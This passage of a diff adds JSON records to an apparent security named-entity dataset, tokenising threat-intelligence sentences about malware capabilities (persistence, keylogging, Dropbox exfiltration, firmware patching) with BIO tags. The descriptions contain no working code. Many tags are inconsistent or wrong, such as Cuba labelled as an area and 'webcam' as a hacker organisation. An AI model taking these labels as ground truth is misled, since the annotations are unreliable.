], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Crimson", + "can", + "add", + "Registry", + "run", + "keys", + "for", + "persistence." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Crimson", + "can", + "spread", + "across", + "systems", + "by", + "infecting", + "removable", + "media." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus" + ] + }, + { + "tokens": [ + "Crimson", + "contains", + "a", + "command", + "to", + "perform", + "screen", + "captures." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Crimson", + "contains", + "a", + "command", + "to", + "collect", + "information", + "about", + "anti-virus", + "software", + "on", + "the", + "victim." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Crimson", + "contains", + "a", + "command", + "to", + "collect", + "the", + "victim", + "PC", + "name,", + "disk", + "drive", + "information,", + "and", + "operating", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Crimson", + "can", + "identify", + "the", + "geographical", + "location", + "of", + "a", + "victim", + "host." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Crimson", + "contains", + "a", + "command", + "to", + "collect", + "the", + "victim", + "MAC", + "address", + "and", + "LAN", + "IP." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Crimson", + "can", + "identify", + "the", + "user", + "on", + "a", + "targeted", + "system." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Crimson", + "has", + "the", + "ability", + "to", + "determine", + "the", + "date", + "and", + "time", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Crimson", + "can", + "determine", + "when", + "it", + "has", + "been", + "installed", + "on", + "a", + "host", + "for", + "at", + "least", + "15", + "days", + "before", + "downloading", + "the", + "final", + "payload." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Crimson", + "can", + "capture", + "webcam", + "video", + "on", + "targeted", + "systems." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Crimson", + "can", + "use", + "a", + "HTTP", + "GET", + "request", + "to", + "download", + "its", + "final", + "payload." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Crimson", + "has", + "the", + "ability", + "to", + "execute", + "commands", + "with", + "the", + "COMSPEC", + "environment", + "variable." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CrossRAT", + "can", + "list", + "all", + "files", + "on", + "a", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CrossRAT", + "creates", + "a", + "Launch", + "Agent", + "on", + "macOS." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Tool", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "CrossRAT", + "uses", + "run", + "keys", + "for", + "persistence", + "on", + "Windows." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CrossRAT", + "is", + "capable", + "of", + "taking", + "screen", + "captures." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "CrossRAT", + "can", + "use", + "an", + "XDG", + "Autostart", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "B-SecTeam", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Crutch", + "has", + "used", + "the", + "WinRAR", + "utility", + "to", + "compress", + "and", + "encrypt", + "stolen", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Crutch", + "can", + "automatically", + "monitor", + "removable", + "drives", + "in", + "a", + "loop", + "and", + "copy", + "interesting", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Crutch", + "has", + "automatically", + "exfiltrated", + "stolen", + "files", + "to", + "Dropbox." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Crutch", + "can", + "use", + "Dropbox", + "to", + "receive", + "commands", + "and", + "upload", + "stolen", + "data." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Crutch", + "can", + "persist", + "via", + "DLL", + "search", + "order", + "hijacking", + "on", + "Google", + "Chrome,", + "Mozilla", + "Firefox,", + "or", + "Microsoft", + "OneDrive." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "B-Tool", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Crutch", + "can", + "exfiltrate", + "files", + "from", + "compromised", + "systems." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Crutch", + "can", + "monitor", + "removable", + "drives", + "and", + "exfiltrate", + "files", + "matching", + "a", + "given", + "extension", + "list." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Crutch", + "can", + "exfiltrate", + "data", + "over", + "the", + "primary", + "C2", + "channel", + "(Dropbox", + "HTTP", + "API)." + ], + "ner_tags": [ + "B-Way", + "O", + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "Crutch", + "has", + "exfiltrated", + "stolen", + "data", + "to", + "Dropbox." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Crutch", + "has", + "used", + "a", + "hardcoded", + "GitHub", + "repository", + "as", + "a", + "fallback", + "channel." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Crutch", + "has", + "staged", + "stolen", + "files", + "in", + "the", + "<code>C:\\AMD\\Temp</code>", + "directory." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Crutch", + "has", + "established", + "persistence", + "with", + "a", + "scheduled", + "task", + "impersonating", + "the", + "Outlook", + "item", + "finder." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Crutch", + "can", + "monitor", + "for", + "removable", + "drives", + "being", + "plugged", + "into", + "the", + "compromised", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Crutch", + "has", + "the", + "ability", + "to", + "persist", + "using", + "scheduled", + "tasks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Crutch", + "has", + "conducted", + "C2", + "communications", + "with", + "a", + "Dropbox", + "account", + "using", + "the", + "HTTP", + "API." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Cryptoistic", + "can", + "retrieve", + "files", + "from", + "the", + "local", + "file", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cryptoistic", + "can", + "engage", + "in", + "encrypted", + "communications", + "with", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cryptoistic", + "has", + "the", + "ability", + "delete", + "files", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cryptoistic", + "can", + "scan", + "a", + "directory", + "to", + "identify", + "files", + "for", + "deletion." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cryptoistic", + "has", + "the", + "ability", + "to", + "send", + "and", + "receive", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Cryptoistic", + "can", + "use", + "TCP", + "in", + "communications", + "with", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cryptoistic", + "can", + "gather", + "data", + "on", + "the", + "user", + "of", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cuba", + "has", + "used", + "<code>SeDebugPrivilege</code>", + "and", + "<code>AdjustTokenPrivileges</code>", + "to", + "elevate", + "privileges." + ], + "ner_tags": [ + "B-Area", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cuba", + "has", + "the", + "ability", + "to", + "encrypt", + "system", + "data", + "and", + "add", + "the", + "\".cuba\"", + "extension", + "to", + "encrypted", + "files." + ], + "ner_tags": [ + "B-Area", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cuba", + "can", + "use", + "the", + "command", + "<code>cmd.exe", + "/c", + "del</code>", + "to", + "delete", + "its", + "artifacts", + "from", + "the", + "system." + ], + "ner_tags": [ + "B-Area", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cuba", + "can", + "enumerate", + "files", + "by", + "using", + "a", + "variety", + "of", + "functions." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cuba", + "has", + "executed", + "hidden", + "PowerShell", + "windows." + ], + "ner_tags": [ + "B-Area", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Cuba", + "can", + "download", + "files", + "from", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cuba", + "logs", + "keystrokes", + "via", + "polling", + "by", + "using", + "<code>GetKeyState</code>", + "and", + "<code>VkKeyScan</code>", + "functions." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Cuba", + "has", + "been", + "disguised", + "as", + "legitimate", + "360", + "Total", + "Security", + "Antivirus", + "and", + "OpenVPN", + "programs." + ], + "ner_tags": [ + "B-Area", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cuba", + "has", + "used", + "several", + "built-in", + "API", + "functions", + "for", + "discovery", + "like", + "GetIpNetTable", + "and", + "NetShareEnum." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Cuba", + "can", + "discover", + "shared", + "resources", + "using", + "the", + "<code>NetShareEnum</code>", + "API", + "call." + ], + "ner_tags": [ + "B-Area", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cuba", + "has", + "used", + "multiple", + "layers", + "of", + "obfuscation", + "to", + "avoid", + "analysis,", + "including", + "its", + "Base64", + "encoded", + "payload." + ], + "ner_tags": [ + "B-Area", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cuba", + "has", + "been", + "dropped", + "onto", + "systems", + "and", + "used", + "for", + "lateral", + "movement", + "via", + "obfuscated", + "PowerShell", + "scripts." + ], + "ner_tags": [ + "B-Area", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Cuba", + "can", + "enumerate", + "processes", + "running", + "on", + "a", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Area", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cuba", + "loaded", + "the", + "payload", + "into", + "memory", + "using", + "PowerShell." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Cuba", + "has", + "a", + "hardcoded", + "list", + "of", + "services", + "and", + "processes", + "to", + "terminate." + ], + "ner_tags": [ + "B-Area", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cuba", + "has", + "a", + "packed", + "payload", + "when", + "delivered." + ], + "ner_tags": [ + "B-Area", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cuba", + "can", + "enumerate", + "local", + "drives,", + "disk", + "type,", + "and", + "disk", + "free", + "space." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "B-SamFile", + "I-Features", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "B-Purp" + ] + }, + { + "tokens": [ + "Cuba", + "can", + "check", + "if", + "Russian", + "language", + "is", + "installed", + "on", + "the", + "infected", + "machine", + "by", + "using", + "the", + "function", + "<code>GetKeyboardLayoutList</code>." + ], + "ner_tags": [ + "B-Area", + "O", + "O", + "O", + "B-Area", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cuba", + "can", + "retrieve", + "the", + "ARP", + "cache", + "from", + "the", + "local", + "system", + "by", + "using", + "<code>GetIpNetTable</code>." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cuba", + "can", + "use", + "the", + "function", + "<code>GetIpNetTable</code>", + "to", + "recover", + "the", + "last", + "connections", + "to", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cuba", + "can", + "query", + "service", + "status", + "using", + "<code>QueryServiceStatusEx</code>", + "function." + ], + "ner_tags": [ + "B-Area", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cuba", + "has", + "used", + "<code>cmd.exe", + "/c</code>", + "and", + "batch", + "files", + "for", + "execution." + ], + "ner_tags": [ + "B-Area", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cuba", + "can", + "modify", + "services", + "by", + "using", + "the", + "<code>OpenService</code>", + "and", + "<code>ChangeServiceConfig</code>", + "functions." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cyclops", + "Blink", + "can", + "encrypt", + "C2", + "messages", + "with", + "AES-256-CBC", + "sent", + "underneath", + "TLS.", + "OpenSSL", + "library", + "functions", + "are", + "also", + "used", + "to", + "encrypt", + "each", + "message", + "using", + "a", + "randomly", + "generated", + "key", + "and", + "IV,", + "which", + "are", + "then", + "encrypted", + "using", + "a", + "hard-coded", + "RSA", + "public", + "key." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Cyclops", + "Blink", + "has", + "maintained", + "persistence", + "by", + "patching", + "legitimate", + "device", + "firmware", + "when", + "it", + "is", + "downloaded,", + "including", + "that", + "of", + "WatchGuard", + "devices." + ], + "ner_tags": [ + "B-Idus", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Cyclops", + "Blink", + "can", + "upload", + "files", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cyclops", + "Blink", + "can", + "decrypt", + "and", + "parse", + "instructions", + "sent", + "from", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Features", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cyclops", + "Blink", + "can", + "modify", + "the", + "Linux", + "iptables", + "firewall", + "to", + "enable", + "C2", + "communication", + "on", + "network", + "devices", + "via", + "a", + "stored", + "list", + "of", + "port", + "numbers." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cyclops", + "Blink", + "has", + "the", + "ability", + "to", + "upload", + "exfiltrated", + "files", + "to", + "a", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "B-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cyclops", + "Blink", + "can", + "use", + "the", + "Linux", + "API", + "`statvfs`", + "to", + "enumerate", + "the", + "current", + "working", + "directory." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cyclops", + "Blink", + "has", + "the", + "ability", + "to", + "download", + "files", + "to", + "target", + "systems." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cyclops", + "Blink", + "has", + "the", + "ability", + "to", + "create", + "a", + "pipe", + "to", + "enable", + "inter-process", + "communication." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cyclops", + "Blink", + "can", + "rename", + "its", + "running", + "process", + "to", + "<code>[kworker:0/1]</code>", + "to", + "masquerade", + "as", + "a", + "Linux", + "kernel", + "thread.", + "Cyclops", + "Blink", + "has", + "also", + "named", + "RC", + "scripts", + "used", + "for", + "persistence", + "after", + "WatchGuard", + "artifacts." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cyclops", + "Blink", + "has", + "used", + "Tor", + "nodes", + "for", + "C2", + "traffic." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cyclops", + "Blink", + "can", + "use", + "various", + "Linux", + "API", + "functions", + "including", + "those", + "for", + "execution", + "and", + "discovery." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "Cyclops", + "Blink", + "can", + "use", + "a", + "custom", + "binary", + "scheme", + "to", + "encode", + "messages", + "with", + "specific", + "commands", + "and", + "parameters", + "to", + "be", + "executed." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cyclops", + "Blink", + "can", + "use", + "non-standard", + "ports", + "for", + "C2", + "not", + "typically", + "associated", + "with", + "HTTP", + "or", + "HTTPS", + "traffic." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Cyclops", + "Blink", + "can", + "enumerate", + "the", + "process", + "it", + "is", + "currently", + "running", + "under." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cyclops", + "Blink", + "can", + "use", + "DNS", + "over", + "HTTPS", + "(DoH)", + "to", + "resolve", + "C2", + "nodes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cyclops", + "Blink", + "has", + "the", + "ability", + "to", + "execute", + "on", + "device", + "startup,", + "using", + "a", + "modified", + "RC", + "script", + "named", + "S51armled." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Cyclops", + "Blink", + "has", + "the", + "ability", + "to", + "query", + "device", + "information." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Cyclops", + "Blink", + "can", + "use", + "the", + "Linux", + "API", + "`if_nameindex`", + "to", + "gather", + "network", + "interface", + "names." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Cyclops", + "Blink", + "has", + "the", + "ability", + "to", + "use", + "the", + "Linux", + "API", + "function", + "`utime`", + "to", + "change", + "the", + "timestamps", + "of", + "modified", + "firmware", + "update", + "images." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cyclops", + "Blink", + "can", + "download", + "files", + "via", + "HTTP", + "and", + "HTTPS." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Features", + "I-Features", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "DCSrv", + "has", + "encrypted", + "drives", + "using", + "the", + "core", + "encryption", + "mechanism", + "from", + "DiskCryptor." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DCSrv's", + "configuration", + "is", + "encrypted." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DCSrv", + "has", + "masqueraded", + "its", + "service", + "as", + "a", + "legitimate", + "svchost.exe", + "process." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "DCSrv", + "has", + "created", + "Registry", + "keys", + "for", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DCSrv", + "has", + "used", + "various", + "Windows", + "API", + "functions,", + "including", + "`DeviceIoControl`,", + "as", + "part", + "of", + "its", + "encryption", + "process." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DCSrv", + "has", + "a", + "function", + "to", + "sleep", + "for", + "two", + "hours", + "before", + "rebooting", + "the", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DCSrv", + "can", + "compare", + "the", + "current", + "time", + "on", + "an", + "infected", + "host", + "with", + "a", + "configuration", + "value", + "to", + "determine", + "when", + "to", + "start", + "the", + "encryption", + "process." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DCSrv", + "has", + "created", + "new", + "services", + "for", + "persistence", + "by", + "modifying", + "the", + "Registry." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "DDKONG", + "decodes", + "an", + "embedded", + "configuration", + "using", + "XOR." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DDKONG", + "lists", + "files", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DDKONG", + "downloads", + "and", + "uploads", + "files", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DDKONG", + "uses", + "Rundll32", + "to", + "ensure", + "only", + "a", + "single", + "instance", + "of", + "itself", + "is", + "running", + "at", + "once." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DEADEYE", + "has", + "the", + "ability", + "to", + "combine", + "multiple", + "sections", + "of", + "a", + "binary", + "which", + "were", + "broken", + "up", + "to", + "evade", + "detection", + "into", + "a", + "single", + ".dll", + "prior", + "to", + "execution." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "DEADEYE.EMBED", + "variant", + "of", + "DEADEYE", + "has", + "the", + "ability", + "to", + "embed", + "payloads", + "inside", + "of", + "a", + "compiled", + "binary." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DEADEYE", + "has", + "encrypted", + "its", + "payload." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DEADEYE", + "can", + "ensure", + "it", + "executes", + "only", + 